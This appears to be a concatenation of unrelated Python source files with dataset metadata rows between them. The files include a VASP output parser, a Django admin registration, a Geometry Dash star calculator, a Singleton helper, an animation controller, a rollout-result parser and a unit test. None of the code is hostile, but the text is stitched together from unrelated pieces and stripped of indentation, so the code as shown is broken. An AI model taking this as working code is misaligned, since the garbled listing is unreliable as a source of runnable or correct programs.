positions = self._content_parser.get_positions('all')
species = self._content_parser.get_species()
forces = self._content_parser.get_forces('all')
stress = self._content_parser.get_stress('all')
# make sure all are sorted, first to last calculation
# (species is constant)
unitcell = sorted(unitcell.items())
positions = sorted(positions.items())
forces = sorted(forces.items())
stress = sorted(stress.items())
# convert to numpy
unitcell = np.asarray([item[1] for item in unitcell])
positions = np.asarray([item[1] for item in positions])
forces = np.asarray([item[1] for item in forces])
stress = np.asarray([item[1] for item in stress])
        # AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
symbols = np.asarray([elements[item].title() for item in species.tolist()])
if (unitcell is not None) and (positions is not None) and \
(species is not None) and (forces is not None) and \
(stress is not None):
trajectory_data = {}
keys = ('cells', 'positions', 'symbols', 'forces', 'stress', 'steps')
stepids = np.arange(unitcell.shape[0])
for key, data in zip(keys, (unitcell, positions, symbols, forces, stress, stepids)):
trajectory_data[key] = data
return trajectory_data
return None
@property
def total_energies(self):
"""Fetch the total energies after the last ionic run."""
energies = self.energies
if energies is None:
return None
energies_dict = {}
for etype in self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type']):
energies_dict[etype] = energies[etype][-1]
# Also return the raw electronic steps energy
energies_dict[etype + '_electronic'] = energies[etype + '_electronic'][-1]
return energies_dict
@property
def energies(self):
"""Fetch the total energies."""
# Check if we want total energy entries for each electronic step.
electronic_step_energies = self._settings.get('electronic_step_energies', self.DEFAULT_SETTINGS['electronic_step_energies'])
return self._energies(nosc=not electronic_step_energies)
def _energies(self, nosc):
"""
Fetch the total energies for all energy types, calculations (ionic steps) and electronic steps.
The returned dict from the parser contains the total energy types as a key (plus the _final, which is
the final total energy ejected by VASP after the closure of the electronic steps). The energies can then
        be found in the flattened ndarray, where the key `electronic_steps` indicates how many electronic steps
        there are per ionic step. Using the combination, one can rebuild the electronic step energy per ionic step etc.
        Because the VASPrun parser returns both the electronic step energies (at the end of each cycle) and the ionic step
        energies (_final), we apply a mapping to recover the naming such that the ionic step energies do not have the suffix,
but the electronic step energies do.
"""
etype = self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type'])
# Create a copy
etype = list(etype)
etype_orig = list(etype)
# Apply mapping and request the correct energies from the parsing results
# VASP 5 has a bug where the energy_no_entropy is not included in the XML output - we have to calculate it here
if self.version.startswith('5'):
# For energy_no_entropy needs to be calculated here
if 'energy_no_entropy' in etype_orig:
etype.append('energy_free')
etype.append('energy_extrapolated')
# energy extrapolated is stored as energy_no_entropy for the ionic steps
if 'energy_extrapolated' in etype_orig:
etype.append('energy_no_entropy')
# Remove duplicates
etype = list(set(etype))
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
# Here we must calculate the true `energy_no_entropy`
if 'energy_no_entropy' in etype_orig:
# The energy_extrapolated_final is the entropy term itself in VASP 5
# Store the calculated energy_no_entropy under 'energy_extrapolated_final',
# which is then recovered as `energy_no_entropy` later
energies['energy_extrapolated_final'] = energies['energy_free_final'] - energies['energy_extrapolated_final']
else:
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
if energies is None:
return None
# Apply mapping - those with `_final` has the suffix removed and those without has `_electronic` added
mapped_energies = {}
mapping = self.ENERGY_MAPPING_VASP5 if self.version.startswith('5') else self.ENERGY_MAPPING
# Reverse the mapping - now key is the name of the original energies output
revmapping = {value: key for key, value in mapping.items()}
for key, value in energies.items():
# Apply mapping if needed
if key in revmapping:
if revmapping[key].replace('_electronic', '') in etype_orig:
mapped_energies[revmapping[key]] = value
else:
mapped_energies[key] = value
return mapped_energies
@property
def projectors(self):
"""Fetch the projectors."""
proj = self._content_parser.get_projectors()
if proj is None:
return None
projectors = {}
prj = []
try:
prj.append(proj['total']) # pylint: disable=unsubscriptable-object
except KeyError:
try:
prj.append(proj['up']) # pylint: disable=unsubscriptable-object
prj.append(proj['down']) # pylint: disable=unsubscriptable-object
except KeyError:
self._logger.error('Did not detect any projectors. Returning.')
if len(prj) == 1:
projectors['projectors'] = prj[0]
else:
projectors['projectors'] = np.asarray(prj)
return projectors
@property
def dielectrics(self):
"""Fetch the dielectric function."""
diel = self._content_parser.get_dielectrics()
if diel is None:
return None
dielectrics = {}
energy = diel.get('energy')
idiel = diel.get('imag')
rdiel = diel.get('real')
epsilon = diel.get('epsilon')
epsilon_ion = diel.get('epsilon_ion')
if energy is not None:
dielectrics['ediel'] = energy
if idiel is not None:
dielectrics['rdiel'] = rdiel
if rdiel is not None:
dielectrics['idiel'] = idiel
if epsilon is not None:
dielectrics['epsilon'] = epsilon
if epsilon_ion is not None:
dielectrics['epsilon_ion'] = epsilon_ion
return dielectrics
@property
def born_charges(self):
"""Fetch the Born effective charges."""
brn = self._content_parser.get_born()
if brn is None:
return None
born = {'born_charges': brn}
return born
@property
def hessian(self):
"""Fetch the Hessian matrix."""
hessian = self._content_parser.get_hessian()
if hessian is None:
return None
hess = {'hessian': hessian}
return hess
@property
def dynmat(self):
"""Fetch the dynamical eigenvectors and eigenvalues."""
dynmat = self._content_parser.get_dynmat()
if dynmat is None:
return None
dyn = {}
dyn['dynvec'] = dynmat['eigenvectors'] # pylint: disable=unsubscriptable-object
dyn['dyneig'] = dynmat['eigenvalues'] # pylint: disable=unsubscriptable-object
return dyn
@property
def dos(self):
"""Fetch the total density of states."""
dos = self._content_parser.get_dos()
if dos is None:
return None
densta = {}
# energy is always there, regardless of
# total, spin or partial
energy = dos['total']['energy'] # pylint: disable=unsubscriptable-object
densta['energy'] = energy
tdos = None
pdos = None
upspin = dos.get('up')
downspin = dos.get('down')
total = dos.get('total')
if (upspin is not None) and (downspin is not None):
tdos = np.stack((upspin['total'], downspin['total']))
if (upspin['partial'] is not None) and \
(downspin['partial'] is not None):
pdos = np.stack((upspin['partial'], downspin['partial']))
else:
tdos = total['total']
pdos = total['partial']
densta['tdos'] = tdos
if pdos is not None:
densta['pdos'] = pdos
return densta
@property
def fermi_level(self):
"""Fetch Fermi level."""
return self._content_parser.get_fermi_level()
@property
def run_status(self):
"""Fetch run_status information"""
info = {}
# First check electronic convergence by comparing executed steps to the
# maximum allowed number of steps (NELM).
energies = self._content_parser.get_energies('last', nosc=False)
parameters = self._content_parser.get_parameters()
info['finished'] = not self._content_parser.truncated
# Only set to true for untruncated run to avoid false positives
if energies is None:
info['electronic_converged'] = False
elif energies.get('electronic_steps')[0] < parameters['nelm'] and not self._content_parser.truncated:
info['electronic_converged'] = True
else:
info['electronic_converged'] = False
# Then check the ionic convergence by comparing executed steps to the
# maximum allowed number of steps (NSW).
energies = self._content_parser.get_energies('all', nosc=True)
if energies is None:
info['ionic_converged'] = False
else:
if len(energies.get('electronic_steps')) < parameters['nsw'] and not self._content_parser.truncated:
info['ionic_converged'] = True
else:
info['ionic_converged'] = False
# Override if nsw is 0 - no ionic steps are performed
if parameters['nsw'] < 1:
info['ionic_converged'] = None
return info
@property
def band_properties(self):
"""Fetch key properties of the electronic structure."""
eigenvalues = self.eigenvalues
occupancies = self.occupancies
if eigenvalues is None:
return None
# Convert dict to index in numpy array
if 'total' in eigenvalues:
eig = np.array(eigenvalues['total'])
occ = np.array(occupancies['total'])
else:
eig = np.array([eigenvalues['up'], eigenvalues['down']])
occ = np.array([occupancies['up'], occupancies['down']])
return get_band_properties(eig, occ)
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
| 31.898571 | 132 | 0.578261 | 21,170 | 0.948094 | 0 | 0 | 12,889 | 0.577231 | 0 | 0 | 8,957 | 0.401138 |
5fb1b34629d1b25a94935e87aa37911d21e8edb9 | 704 | py | Python | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-06-18T20:20:39.000Z | 2019-11-09T20:21:06.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-12-04T23:26:42.000Z | 2022-02-10T12:02:19.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 3 | 2019-06-21T22:37:32.000Z | 2019-10-31T00:38:45.000Z | from django.contrib import admin
from .models import Produto, TipoProduto, Estoque
# Register your models here.
class TipoProdutoAdmin(admin.ModelAdmin):
search_fields = ['descricao',]
admin.site.register(TipoProduto, TipoProdutoAdmin)
class EstoqueAdmin(admin.ModelAdmin):
search_fields = ['produto__nome']
list_display = ('produto', 'quantidade', 'tipo_movimentacao', 'data', 'observacao')
admin.site.register(Estoque, EstoqueAdmin)
class ProdutoAdmin(admin.ModelAdmin):
search_fields = ['nome']
list_filter = ['tipo_produto', ]
list_display = ('nome', 'preco', 'tipo_produto', 'quantidade_em_estoque', 'data_ultima_atualizacao')
admin.site.register(Produto, ProdutoAdmin) | 35.2 | 105 | 0.755682 | 448 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.294034 |
5fb1ba21e31a7c2b9e588c895f10ae57243ce651 | 3,137 | py | Python | star/star.py | gd-star-pp/star-pp | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | 2 | 2021-10-10T23:42:30.000Z | 2022-03-31T19:43:13.000Z | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | import gd, itertools
from cube import calculate_cube
from ball import calculate_ball
from helpers import average
client = gd.Client()
def calculate_ship(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_ufo(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_wave(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_robot(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_spider(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
modes = {gd.PortalType.CUBE: calculate_cube,
gd.PortalType.SHIP: calculate_ship,
         gd.PortalType.BALL: calculate_ball,  # duplicate BALL -> calculate_ufo entry removed; it silently overrode this mapping
gd.PortalType.UFO: calculate_ufo,
gd.PortalType.WAVE: calculate_wave,
gd.PortalType.ROBOT: calculate_robot,
gd.PortalType.SPIDER: calculate_spider,
gd.Gamemode.CUBE: calculate_cube,
gd.Gamemode.SHIP: calculate_ship,
         gd.Gamemode.BALL: calculate_ball,  # duplicate key removed (see PortalType above)
gd.Gamemode.UFO: calculate_ufo,
gd.Gamemode.WAVE: calculate_wave,
gd.Gamemode.ROBOT: calculate_robot,
gd.Gamemode.SPIDER: calculate_spider}
def main():
totalstar = []
database = gd.api.save.load()
levels = database.load_my_levels()
#level = levels.get_by_name("star test")
level = client.run(client.get_level(3884458)) # id
editor = level.open_editor()
startspeed = editor.get_start_speed()
mode = modes.get(editor.header.gamemode)
star = mode(editor, level, gd.api.Object(x=0), startspeed, -1)
totalstar.append(star)
portal_count = 0
for portal, speed in itertools.zip_longest(editor.get_portals(), editor.get_speeds()):
try:
speed = gd.Speed.from_name(gd.SpeedChange(speed.id).name)
except AttributeError: # fix speed later
pass
        if portal.id in (10, 11, 45, 46, 101, 99, 286, 287, 747, 749):
# speed portals and other extra portals
continue
mode = modes.get(gd.PortalType(portal.id))
if mode:
star = mode(editor, level, portal, speed, portal_count)
if star is not None:
totalstar.append(star)
portal_count += 1
totalstar.sort(reverse=True)
weights = [1.25, 1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0]
i = 0
for star, weight in itertools.zip_longest(totalstar, weights):
if weight is None:
weight = 0
if star is None:
break
print(star, weight)
totalstar[i] = round(star*weight, 2)
i += 1
print(totalstar)
return round(average(totalstar), 2)
if __name__ == "__main__":
star = main()
print(star) | 36.057471 | 203 | 0.646159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.035065 |
5fb3ccf7fca90c61707cbd90f3475846779b54b9 | 341 | py | Python | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 30 | 2016-04-30T01:56:05.000Z | 2022-03-09T22:19:12.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 1 | 2021-05-19T19:36:45.000Z | 2021-05-19T19:36:45.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 17 | 2020-01-28T13:54:06.000Z | 2022-03-26T09:49:27.000Z | from collections import defaultdict
c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
x=i%a==0
y=i%b==0
if x and y:
c[3].add(i)
elif x and not y:
c[1].add(i)
elif y and not x:
c[2].add(i)
else:
c[4].add(i)
o=[]
for i in range(1,5):
o.append(str(len(c[i])))
print(' '.join(o)) | 17.05 | 42 | 0.58651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.008798 |
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c | 520 | py | Python | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 3 | 2019-08-22T01:20:16.000Z | 2021-02-05T09:11:50.000Z | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | null | null | null | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 2 | 2019-08-22T01:20:18.000Z | 2021-05-27T14:40:12.000Z | """Module with useful exceptions for Parser."""
class BadOperationIdentifier(Exception):
"""Bad operation identifier used."""
class BadOperationArgument(Exception):
"""Bad argument provided to operation."""
class BadInPlaceValue(Exception):
"""Bad in-place value provided as argument."""
class ParsingError(Exception):
"""Parsing error."""
def __init__(self, line_index, line, exception):
self.line_index = line_index
self.line_code = line
self.exception = exception
| 22.608696 | 52 | 0.696154 | 460 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 190 | 0.365385 |
5fb7671976b6e01ae676fe790432693d8f4d3e4c | 286 | py | Python | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | null | null | null | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | 2 | 2018-03-27T11:06:46.000Z | 2020-10-27T20:48:51.000Z | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | 4 | 2018-02-26T08:12:39.000Z | 2018-05-18T06:01:01.000Z | class Singleton(object):
_instances = {}
def __new__(cls, *args, **kwargs):
if cls not in cls._instances:
# noinspection PyArgumentList
cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)
return cls._instances[cls]
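# Minimal usage sketch (the subclass name is hypothetical): every call
# returns the same cached instance per class.
#
#   class Config(Singleton):
#       pass
#
#   assert Config() is Config()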
| 31.777778 | 85 | 0.618881 | 285 | 0.996503 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.101399 |
5fb78ad70383d16f179dd4a23ab825be06e844e6 | 1,919 | py | Python | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 155 | 2015-11-01T17:48:41.000Z | 2022-02-06T21:37:41.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 193 | 2015-09-29T21:40:31.000Z | 2020-04-21T15:09:13.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 54 | 2015-09-30T15:51:05.000Z | 2022-02-13T05:26:20.000Z | import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard
class MyAppDashboard(AppDashboard):
def __init__(self,db,ell):
AppDashboard.__init__(self,db,ell)
def most_current_ranking(self,app, butler, alg_label):
"""
        Description: Returns a ranking of arms in the form of a list of dictionaries, which is convenient for downstream applications
Expected input:
(string) alg_label : must be a valid alg_label contained in alg_list list of dicts
The 'headers' contains a list of dictionaries corresponding to each column of the table with fields 'label' and 'field'
        where 'label' is the label of the column to be put on top of the table, and 'field' is the name of the field in 'data' that the column corresponds to
Expected output (in dict):
plot_type : 'columnar_table'
headers : [ {'label':'Rank','field':'rank'}, {'label':'Target','field':'index'} ]
(list of dicts with fields) data (each dict is a row, each field is the column for that row):
(int) index : index of target
(int) ranking : rank (0 to number of targets - 1) representing belief of being best arm
"""
item = app.getModel(json.dumps({'exp_uid':app.exp_uid, 'args': {'alg_label':alg_label}}))
return_dict = {}
return_dict['headers'] = [{'label':'Rank','field':'rank'},
{'label':'Target','field':'index'},
{'label':'Score','field':'score'},
{'label':'Precision','field':'precision'}]
for target in item['targets']:
for key in ['score', 'precision']:
target[key] = '{:0.5f}'.format(target[key])
return_dict['data'] = item['targets']
return_dict['plot_type'] = 'columnar_table'
return return_dict
| 47.975 | 158 | 0.604482 | 1,828 | 0.952579 | 0 | 0 | 0 | 0 | 0 | 0 | 1,205 | 0.627931 |
5fba9266d157d784d487f4f6d96c252ab58bc927 | 221 | py | Python | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | tetov/ITA19 | 1af68a8885caf83acd98f4136d0286539ccbe63b | [
"MIT"
] | 7 | 2019-11-13T20:29:54.000Z | 2020-02-26T14:30:54.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 4 | 2019-11-07T20:57:51.000Z | 2020-03-04T11:43:18.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 6 | 2019-10-30T13:25:54.000Z | 2020-02-14T14:06:09.000Z | import os
import compas
from compas.datastructures import Mesh
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
print(mesh.summary())
| 18.416667 | 38 | 0.737557 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.076923 |
5fbebd443ba2cc788cd34ccb4de7f2967a894072 | 3,957 | py | Python | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 4 | 2020-05-20T03:55:19.000Z | 2020-12-24T06:33:40.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-05-18T11:21:35.000Z | 2020-07-07T21:25:57.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-07-20T06:57:13.000Z | 2020-07-20T06:57:13.000Z | #!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from PySignal import Signal
from .animation_controller import AnimationController
from ..scene.components import ComponentBase
class GroupAnimationController(ComponentBase, AnimationController):
updated_animation_frame = Signal()
reached_end_of_animation = Signal()
def __init__(self, scene_object):
ComponentBase.__init__(self, scene_object)
self.mainContext = 0
AnimationController.__init__(self)
self._animation_controllers = []
def add_animation_controller(self, animation_controller):
self._animation_controllers.append(animation_controller)
self.frameTime = animation_controller.frameTime
def get_animation_controllers(self):
return self._animation_controllers
def update(self, dt):
""" update current frame and global joint transformation matrices
"""
dt *= self.animationSpeed
if self.isLoadedCorrectly():
if self.playAnimation:
# frame and transformation matrices
self.animationTime += dt
self.currentFrameNumber = int(self.animationTime / self.getFrameTime())
self.updateTransformation(self.currentFrameNumber)
# update gui
if self.currentFrameNumber > self.getNumberOfFrames():
self.resetAnimationTime()
self.reached_end_of_animation.emit(self.loopAnimation)
else:
self.updated_animation_frame.emit(self.currentFrameNumber)
def draw(self, modelMatrix, viewMatrix, projectionMatrix, lightSources):
return
def updateTransformation(self, frameNumber=None):
for controller in self._animation_controllers:
if frameNumber is not None:
controller.setCurrentFrameNumber(frameNumber)
controller.updateTransformation()
def resetAnimationTime(self):
AnimationController.resetAnimationTime(self)
self.currentFrameNumber = 0
self.updateTransformation(self.currentFrameNumber)
def setCurrentFrameNumber(self, frameNumber):
self.currentFrameNumber = frameNumber
self.updateTransformation(self.currentFrameNumber)
self.animationTime = self.getFrameTime() * self.currentFrameNumber
def getNumberOfFrames(self):
n_frames = [0]
n_frames += [controller.getNumberOfFrames() for controller in self._animation_controllers]
return max(n_frames)
def isLoadedCorrectly(self):
return len(self._animation_controllers) > 0
def getFrameTime(self):
if self.isLoadedCorrectly():
# print self.frameTime
return self.frameTime
else:
return 0
def toggle_animation_loop(self):
self.loopAnimation = not self.loopAnimation | 39.57 | 98 | 0.706849 | 2,717 | 0.686631 | 0 | 0 | 0 | 0 | 0 | 0 | 1,235 | 0.312105 |
5fc115feb7229821fab8bd49844fdb6a161d73e2 | 408 | py | Python | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/2020_hew_app | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 1 | 2021-06-03T02:54:51.000Z | 2021-06-03T02:54:51.000Z | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/agri | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 19 | 2021-01-01T09:48:51.000Z | 2021-04-08T09:11:30.000Z | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/agri | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 1 | 2021-09-28T11:54:25.000Z | 2021-09-28T11:54:25.000Z | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from database.database import ma
from models import KoeFavorite
from .user_schema import UserSchema
from .koe_schema import KoeSchema
class KoeFavoriteSchema(ma.SQLAlchemyAutoSchema):
Koe = ma.Nested(KoeSchema)
user = ma.Nested(UserSchema)
class Meta:
model = KoeFavorite
| 25.5 | 77 | 0.742647 | 163 | 0.39951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
5fc3fd1b7cba71af7933022261d214435bda9000 | 2,786 | py | Python | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 14 | 2020-04-03T12:41:50.000Z | 2022-02-04T00:05:01.000Z | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 2 | 2020-03-02T04:32:58.000Z | 2021-09-15T20:02:25.000Z | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 8 | 2020-03-02T10:30:36.000Z | 2021-08-03T02:29:38.000Z | import pickle
import sys
import numpy as np
def geomean(iterable):
a = np.array(iterable).astype(float)
prod = a.prod()
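    # Guard against a negative product (odd count of negative values) so the
    # fractional power below stays real; effectively a geomean of magnitudes.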
prod = -prod if prod < 0 else prod
return prod**(1.0/len(a))
# Define the valid programs here
def is_valid_pgm(pgm):
pgms = ['471', '4926', '12092', '3449', '4567', '16510', '6118', '15427', '112', '15801', '3229', '12471', '3271', '16599', '11090', '16470', '10308', '9724', '8971', '15292', '15117', '6827', '9381', '18028', '4278', '16971', '1985', '12721', '16698', '7246', '1335', '7923', '13570', '11580', '16010', '10492', '10396', '13085', '17532', '14602', '16879', '8518', '1546', '12204', '15008', '5381']
for ref_pgm in pgms:
if pgm == ref_pgm:
return True
return False
def parse_rollout(baseline_fn="baseline.txt", rollout_fn="ppo_results_orig_norm_24pass_random_log.csv"):
pgms = []
results = {}
total_count = 0
total_rl_cycle = []
with open(rollout_fn) as f:
lines = f.readlines()
for line in lines:
data = line.split(',')
pgm = data[0] + '.c'
cycle = int(data[1].replace('\n',''))
#if cycle < 20000 and cycle > 1000:
#if cycle < 10000000 and is_valid_pgm(data[0]):
if cycle < 10000000:
cycles = [cycle]
results[pgm] = cycles
total_count += 1
total_rl_cycle.append(cycle)
pgms.append(data[0])
better_count = 0
equal_count = 0
total_o3_cycle = []
with open(baseline_fn) as f:
lines = f.readlines()
lines = lines[1:]
for line in lines:
data = line.split('|')
            if data[0] in results:
cycle = int(data[2])
results[data[0]].append(cycle)
total_o3_cycle.append(cycle)
#if cycle == 10000000:
# print(data[0])
# raise
if cycle > results[data[0]][0]:
better_count += 1
if cycle == results[data[0]][0]:
equal_count += 1
print(results)
print("total_count: {}".format(total_count))
print("better_count: {}".format(better_count))
print("equal_count: {}".format(equal_count))
print("worse_count: {}".format(total_count - better_count - equal_count))
avg_o3_cycle = np.average(total_o3_cycle)
avg_rl_cycle = np.average(total_rl_cycle)
geomean_o3_cycle = geomean(total_o3_cycle)
geomean_rl_cycle = geomean(total_rl_cycle)
print("average o3 cycles: {}".format(avg_o3_cycle))
print("average rl cycles: {}".format(avg_rl_cycle))
print("ratio: {}".format(avg_o3_cycle/avg_rl_cycle))
print("geomean o3 cycles: {}".format(geomean_o3_cycle))
print("geomean rl cycles: {}".format(geomean_rl_cycle))
print("ratio: {}".format(geomean_o3_cycle/geomean_rl_cycle))
#print(pgms)
if __name__ == '__main__':
rollout_fn = sys.argv[1]
parse_rollout(rollout_fn=rollout_fn)
| 34.395062 | 401 | 0.623116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 742 | 0.266332 |
5fc54e77ecccf0f0df60b5cd1eae650a55b8cc8e | 3,349 | py | Python | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 37 | 2020-01-16T15:00:27.000Z | 2021-08-22T11:18:56.000Z | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 18 | 2020-01-27T19:04:00.000Z | 2021-09-26T14:19:39.000Z | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 8 | 2020-07-07T14:05:44.000Z | 2021-07-30T00:44:36.000Z | import unittest
import pandas as pd
import numpy as np
import os
import tempfile
import shutil
from signatureanalyzer.signatureanalyzer import run_spectra
from signatureanalyzer.bnmf import ardnmf
from signatureanalyzer.utils import file_loader
SPECTRA_ARROW = "../../examples/example_luad_spectra_1.tsv"
SPECTRA_WORD = "../../examples/example_luad_spectra_2.tsv"
class TestMapping(unittest.TestCase):
"""
Test Mapping
"""
def test_sbs_cosmic2(self):
"""Test SBS Cosmic2"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic2', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic2.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
        dirpath = tempfile.mkdtemp()  # re-create the scratch dir removed above so the second run has a valid outdir
        np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic2', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
